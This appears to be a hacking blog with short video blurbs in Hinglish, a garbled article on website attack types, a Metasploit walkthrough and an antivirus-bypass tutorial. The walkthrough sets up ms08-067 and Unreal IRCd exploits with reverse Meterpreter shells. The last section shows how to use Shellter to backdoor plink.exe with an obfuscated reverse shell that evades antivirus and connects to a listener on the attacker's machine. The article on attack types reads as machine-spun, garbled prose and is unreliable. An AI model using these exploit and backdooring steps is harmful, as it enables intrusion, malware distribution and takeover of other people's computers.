Sunday, 14 May 2017

One Application For Facebook And Messenger

Hello friends is video me main apko aisi android application ke bare me bataunga jo ki facebook aur messenger dono ka kam karti hai bhut se feature aise hai jo apko facebook me na mile.. jinke phone ki storage kam hai 4gb ya 8gb unke liye bhut hi achi application hai kyuki ye facebook se bhut kam size ki hai..



Monday, 1 May 2017

Best Cmd Commands You Must Know

Is Video Me Main Apko Kuch Important commands ke bare me bataunga jo kafi use full hongi aapke liye aur shyad hi aap jante ho to video dekhiye pasand aaye to hamare channel subscribe kariye thanks for watching..

Wednesday, 26 April 2017

How To Install Burp Suite Pro In Kali Linux In Hindi

Is Video Me main apko bataunga ki Brup suite professional ko kaise install karna hai aur use kaise configure karna hai apni kali linux system per.. so video ko pura dekhe.. ye advance tool hai web penetration ke liye thanks for watching..


Saturday, 22 April 2017

What Is Backdoor In Hindi

Is video me main apko bataunga ki backdoor kya hota hai aur hacker backdoor ka use kyu karte hai.. 

FOR MORE VIDEOS SUBSCRIBE MY CHANNEL THANK YOU # New Tech


Best 5 Android Hacking Apps 2017


Best Free Vpn For Android

Many Application Are Available In Play Store Who Provide Free Vpn But Many Apps Are Not Work And Many Apps Appear  Ads..But Here I Am Tell You Best Vpn Application For Android.. No ads no time limit free life time.. So Let's See Video How To use App.. If You Like My Video Please Subscribe My YouTube Channel. Thanks For Watching..


How To Install Tor Browser In Kali Linux 2.0

In This Video I am Show You How To Install Tor Browser In Kali Linux And Configure Tor For Full Anonymous Over All Internet.. No Anybody Track You..So Let's See Video.. If You Like Video So Please Subscribe My You Tube Channel.. Thanks..

Thursday, 3 March 2016

Best Techniques To Hack A Website Easly



Hii Friends Welcome To HacCoders. As per as I do know regarding hackers mind owing to my moral expertisethese days progressing to share with you all regarding the ways of website hacking. Hackers use totally different ways to focus on an internet site or a server to either steal sensitive info or use the server resources to spam or do different malicious activities.

Of course, the consequences of such associate degree attack may be devastating, and also, the worst half is after they use your server resources to perform totally different outlawed activities.
 
In this article, I will be able to list the highest half-dozen website security problems that you just ought to bear in mind of.

#1. Code Injection

Web sites that lack some kind of kind validation area unit liable to code injection. this happens once a code is injected into a malicious program or an internet application with the intention of adjusting the course of execution, to realize access to associate degree organization’s resources. These sorts of code injections may be fatalthey'll vary from completely destroying an internet site to stealing valuable user info.

In 2013, hackers managed to steal over $100,000 from 
associate degree ISP that's based mostly inAmerican state.so staying safe from code injection may be a shouldto shield your web site from this sort of attack, you wish to forestall any untrusted input like invalid characters from planning to your SQL info.

#2. SQL Injection 

SQL injection may be a code injection technique that's want to manipulate a website’s information.this way of attack is employed by hackers to focus on dynamic CMS information bases likeWordPress to steal data and different valuable info.
SQL injection is additionally the foremost common form of application layer attack techniques that used nowadays. this sort of attack affects net applications that ar improperly coded and permits the hacker to inject SQL commands into any login type, that permits them a straightforward access to the information that's command at intervals your information.


#3. Cross Site Scripting (XSS)

XSS may be a form of security vulnerability that's found in net applications, within which a hacker injects a client-side script into trustworthy web pages or URLs that permits them to steal sensitive user information or the other information.
XSS may also enable Associate in Nursing offender to control an internet page and shows it as if it’s a login screen to the guests. Associate in a Nursing example of this attack was discovered to have an effect on WordPress four.2 comments, that enabled the attackers to compromise a website mistreatment the comments.


Easy Way To Hack Website in 2016 


To check for XSS vulnerability, you'll use an internet Vulnerability Scanner. net Vulnerability Scanner scans your website and checks whether or not it’s XSS vulnerable or not. it'll tell you which of themURLs or scripts ar prone to these attacks in order that you'll fix it. WVS will check for any SQL injections or the other net vulnerability.


#4. Brute-force attack

Brute-force attacks work by shot your username and word till it finds the proper combination. Weak passwords will simply be guessed by this attack, that’s why it’s powerfully suggested to use strong/hard to guess passwords.
To protect yourself from this attack is easy; {you will|you'll|you'll be able to} merely block information science addresses that area unit taking an excessive amount of server resources otherwise you can use multi-factor authentication, and don’t forget to use sturdy passwords.



#5. Denial of Service Attack (DoS)

The most infamous types of an attacks area unit the DoS attacks. just because any hacker will bombard the victims website with innumerable requests, that causes the server to crash. DoS attacks don't seem to be hacking attacks, however, they're merely accustomed take down an internet site. This, after all, makes the website go offline and it needs manual intervention from the webmaster to bring it back on-line.


Moreover, AN assailant can even send you spam email messages to attack your email account. Since your email account is equipped for a free service like Outlook, you're given a restricted quota, that limits your account to a definite quantity of knowledge that you simply will send. By spamming your email messages, AN assailant will consume your entire quota, preventing you from receiving from now on messages. Imagine you open your email account someday and you see thousands of spam messages.

#6. Unencrypted Protocols

Any protocol that's unencrypted will enable AN assailant to steal valuable info from your users. Thus, it’s continually most well-liked and suggested to use the quality security encoding technology known as “Secure Sockets Layer” or SSL for the brief, whenever there’s personal info being changed between your website and also the information.
SSL works by providing a secure channel between 2 machines that's operative over the net or an inside network. This protocol is employed once a browser must connect with an internet server firmly over the net while not the spying eyes of the hackers.



#How to protect your website

If you're employing a Content Management System (CMS) like Joomla or WordPress, then buy their blogs, scan their latest articles and continually keep your CMS up to this point. Keep all of your third party plugins up to this point. Remember, any forms that modify users to transfer something can be a possible threat. These threats can modify AN assailant to own full access to your information. therefore, listen to what your users area unit uploading and scan these files before you approve it.



Install security plugins for your CMS and keep them up to this point. ensure you recognize the way to assemble it properly to maximize its defense.If you engineered your own CMS/website that has AN admin login type, then don’t use the default admin name, eg: rather than “adminlogin.php”, why not decision it “something.php” etc.


Test your website for any vulnerability. Use the free trial of net Vulnerability Scanner to check your website. Make sure you're mistreatment sturdy passwords and newer share them with anyone. Keep these passwords in an exceedingly safe place. It’s judicious to not store them on your PC simply just in case your PC gets hacked.

Saturday, 6 February 2016

Metasploit Full Tutorials Beginners To Professional

metasploit tutorials beginners to progessianal

Introduction


The Metasploit Framework (MSF) is far more than just a collection of exploits. It’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel. I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment.
This course has been written in a manner to encompass not just the front end “user” aspects of the framework, but rather give you an introduction to the capabilities that Metasploit provides. We aim to give you an in depth look into the many features of the MSF, and provide you with the skill and confidence to utilize this amazing tool to its utmost capabilities.

Updates

Normally to update Metasploit, you simply run “mfsupdate”, but according to the Rapid 7 website,
Metasploit updates are synced to update weekly with Kali.

(https://community.rapid7.com/thread/3007)

Metasploit Overview

You can start Metasploit Simple Type On Terminal "msfconsole"
Once Metasploit loads you will see the following main screen and be given an “msf >” prompt.

metasploit tutorials beginners to progessianal

Metasploit can be a little confusing if you have never used it before, but once you get used to how it works, you can do some amazing things with it.

Basically, using Metasploit to attack a target system usually involves:

1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes

The screenshot below shows an example of this process, but don’t worry; we will cover the process in much more detail as we go along.

metasploit tutorials beginners to progessianal

Depending on the type of exploit, once our exploit is complete we will normally end up with either a remote shell to the computer or a Meterpreter shell.

A remote shell is basically a remote terminal connection or a text version of a remote desktop for Windows users. It allows us to enter commands as if we are sitting at the keyboard.

But a Meterpreter shell offers a ton of interesting programs and utilities that we can run to gather information about the target machine, control devices like the webcam and microphone, or even use this foothold to get further access into the network.

And of course, if needed, you can drop to a regular shell at any time.

In most cases, depending on what you are trying to do, a Meterpreter Shell is much more advantageous than just a regular shell.

We will discuss the Meterpreter Shell later, but for now let’s quickly cover the first five steps.

Tech Note:
When all else fails and you start to feel lost in
Metasploit, or the Meterpreter shell, try typing
the “help” command.
You can also use the “tab” key to autocomplete a
line or hit it twice to show all available exploits
and payloads.

Ex. show exploits <tab><tab>

Picking an Exploit


If you are a glutton for punishment and want to view all the exploits, just type “show exploits” from the msf prompt:

msf > show exploits
But it is easier to use the search command to find what you are looking for. Simply type “search” and then the information you want. Sometimes being very specific will help you find the exploit you want quicker.

Tech Note:
If you see an error that says, “[!] Database not
connected or cache not built, using slow
search” all you need to do is start the PostSQL
Database before running msfconsole (though
your search will work without it running, it will
just be slower).
To start the Database at a terminal prompt, type
the following:

● service postgresql start
● service metasploit start
● msfconsole
Metasploit allows you to search for exploits in multiple ways, by platform, or even CVE (Common Vulnerabilities and Exposures) and bugtrack numbers.
Type “help search” to see all of the options:

metasploit tutorials beginners to progessianal

To search by name, just type search and the text you want. So for example to see if Metasploit has an exploit for Microsoft’s Security Bulletin MS13-069 vulnerability:

metasploit tutorials beginners to progessianal

To see a specific CVE ID number:

metasploit tutorials beginners to progessianal

To see all the CVE ID’s from this year (truncated list):

metasploit tutorials beginners to progessianal

Or to see exploit information for a particular program just use its name:

msf > search unreal

When you see an exploit that you want to know more about, just copy and paste the full path name and use the info command:

msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

This will display the full information screen for the exploit:

metasploit tutorials beginners to progessianal






The information screen shows the author’s name, a brief overview (not shown) along with the basic options that can be set, a description and website security bulletin references for the exploit (shown).

As you can see in the picture above, we can set a couple options for this exploit, which leads us into our next section.

But before we set our exploit options, we need to “use” it. Once we know we have the exploit we want, we simply run the “use” command with the exploit name. Again copying and pasting the exploit
path and name works very well here too:

metasploit tutorials beginners to progessianal


Okay, we are now using our exploit, so how do we set the options?

Setting Exploit Options


Setting options in Metasploit is as simple as using the “set” command followed by the variable name to set and then the value.

set <Variable Name> <Value>

Tech Note:
LHOST = Local Host, or our
Kali System
RHOST = Remote Host, or
our target System
LPORT = Port we want to
use on our Kali System
RPORT = Port we want to
attack on our target System

To set what variables can be set, use the “show options” command:

metasploit tutorials beginners to progessianal

This exploit only uses two main variables, RHOST and RPORT. Rhost is the remote host that we are attacking and Rport is the remote port.

Let’s go ahead and set the RHOST variable using the set command. If the target system’s IP address was 192.168.0.20 then we would use the set command below:

metasploit tutorials beginners to progessianal


If we run the “show options” command again, we can see that the variable has indeed been set:

metasploit tutorials beginners to progessianal
This is all you really need is set in this exploit. You could now run the “exploit” command to execute it.
If you are feeling a bit lost, don’t panic, we will cover this in more detail in the Metasploitable chapter.

Multiple Target Types


The Unreal backdoor was a fairly easy exploit to use. Some exploits have multiple variables that you need to set and they might even have some optional variables that can also be configured.

As you use Metasploit, you will find that some have multiple target types that can be attacked, and that the exact target needs to be set for the exploit to work properly. To see the target, enter “show targets”.

On the exploit we used above, the target is automatic, so we don’t need to set it.

metasploit tutorials beginners to progessianal


But on others, there are numerous targets and we need to pick the right one.

Getting a remote shell on a Windows XP Machine


We took a brief look at one of the Linux exploits, let’s go ahead and run through the ms08-067 exploit
as it is one of the more popular Windows exploits.

1. To start, simply use the exploit:
msf > use exploit/windows/smb/ms08_067_netapi

2. Now type, “show options”:

metasploit tutorials beginners to progessianal





Notice that by default the target is set to “Automatic Targeting”. I have had mixed results with using automatic targeting, and sometimes things work better if you set the exact target.

3. If we want to set a specific target type, “show targets”:

metasploit tutorials beginners to progessianal


4. Then type, “set target <ID#>” to set the actual target

metasploit tutorials beginners to progessianal

5. And again a “show options” will reveal that we indeed have the target value set:

metasploit tutorials beginners to progessianal

Lastly, though not often used in regular exploits, we can also set advanced options if we want.
To show the advanced options, just type “show advanced”:

metasploit tutorials beginners to progessianal

Now we have seen how to select an exploit and how to set the options. On many exploits we also
need to set a payload.

Picking a Payload


What’s the fun of exploiting a machine if you can’t do anything with it? Payloads allow you to do something functional with the exploited system.

Metasploit comes with a multitude of different payloads that you can use. To see them, just type
show payloads”:

metasploit tutorials beginners to progessianal


Or you can type “set payload” and hit the tab key twice. This will prompt Metasploit to ask you if you
want to see all the available payloads:

Most of the payloads are laid out in the format of ‘Operating System/Shell Type’ as shown below:
● set payload/osx/x86/shell_reverse_tcp
● set payload/linux/x64/shell_reverse_tcp
● set payload/windows/shell_reverse_tcp
● set payload/windows/meterpreter/reverse_tcp

Simply select the correct OS for your target and then pick the payload you want.

The most popular types of payloads are shells, either a regular remote shell or a Meterpreter shell.

If we just want a remote terminal shell to remotely run commands, use the standard shell. If you want the capability to manipulate the session and run extended commands then you will want the Meterpreter shell (which we will discuss in further detail in the next chapter).

There are different types of ways that the payloads communicate back to the attacking system. I usually prefer reverse_tcp shells as once they are executed on the target system, they tell the attacking machine to connect back out to our Kali system.

The big advantage to this is that with the victim machine technically “initiating” the connection out, it usually is not blocked by the Firewall, as a connection trying to come in from the outside most likely will.

Once we know what payload we want to use, we set it using the “set” command.

6. So for our example let’s use a Meterpreter shell for a Windows system and have it connect
back to us via TCP:

metasploit tutorials beginners to progessianal

Now that our payload is set, we just need to set the options for it.

Setting Payload Options


Payloads have options that are set in the exact same way that the exploit is set. Usually payload settings include the IP address and port for the exploit to connect out to.

And these too are set with the “set” command.

7. Type “show options” to see what settings the payload needs:

metasploit tutorials beginners to progessianal




As you can see in the image above, a new section titled “Payload options” shows up when we run the command. We also have three new options that we can set, “EXITFUNC, LHOST, and LPORT”.

We will leave the EXITFUNC and LPORT settings to the default.

8. But we need to put in the LHOST or local host address. This is the IP address for our Kali system:

metasploit tutorials beginners to progessianal


Once our payload options are set, we can go ahead and run the exploit.

Running the Exploit


When starting out, it is always a good idea to run the “show options” command one last time and double check that everything is set correctly.

metasploit tutorials beginners to progessianal

If you notice above, looks like we forgot to set the target system (RHOST) IP address!

We set the RHOST for a prior example, but when we switched exploits, we never re-set the remote
host IP address. This can happen when you are running through a lot of exploits, or attacking different
systems, so it is a good idea to double check your settings.

9. Set the RHOST option by typing:
set RHOST 192.168.0.20

Checking the options one last time, everything looks good:

metasploit tutorials beginners to progessianal

Our payload is selected, and all the options that we need to set are set.

We can now run the exploit.

10. To do so, simply use the “exploit” command.

metasploit tutorials beginners to progessianal

The exploit then runs and when successful the payload executes and if the exploit works, we get a
remote connection.

Connecting to a Remote Session


Once we have a successful exploit we will be able to view any remote sessions that were created. To
check what sessions were created type the “sessions” command.

Any sessions that were created will show up along with the IP address, computer name and user name
of the target system.

metasploit tutorials beginners to progessianal

We can now connect to the session interactively with the “sessions -i <ID#>” command as shown in the sample session above.

When we connect to the session, the prompt will change into a meterpreter prompt:

metasploit tutorials beginners to progessianal

We will cover the Meterpreter shell in more depth in the next chapter. But for now, if we just type the “shell” command we can see that we do indeed have a remote shell to the Windows system.


Thursday, 4 February 2016

Anti-Virus Bypass With Shellter 6.0 On Kali Linux

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Hello Every One Welcome To HacCoders (Information You Can Trust!).. So Today We Will Discuss Anti-Virus ByPass With Shellter.. But First Know What Is Shellter Because Many People Don't Know What is Shelter.. So Let's Start... :)

What Is Shellter..


Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application, and this is just the tip of the iceberg.

 Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.


So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )
I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.
2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.
3. Change to the ‘/root/Desktop/shellter’ directory.
4. Start Shellter – type, “wine shellter.exe”

Anti-Virus Bypass with Shellter 5.1 on Kali Linux


5. Enter “A” for automatic
6. At the PE Target Prompt, enter “plink.exe
7. When prompted to enable stealth mode enter “Y”:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux
 

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)

Anti-Virus Bypass with Shellter 5.1 on Kali Linux
 


Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux



You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:
  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit
Anti-Virus Bypass with Shellter 5.1 on Kali Linux


12. Copy the ‘plink.exe’ file to the Windows system:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux


13. Now, in Windows, If you run plink.exe from the command prompt:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux


It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:
 
Anti-Virus Bypass with Shellter 5.1 on Kali Linux


Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:
 
Anti-Virus Bypass with Shellter 5.1 on Kali Linux


We can run “sysinfo” to view information about the computer:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

 
So We Are Sucsess.. Thanks For Reading..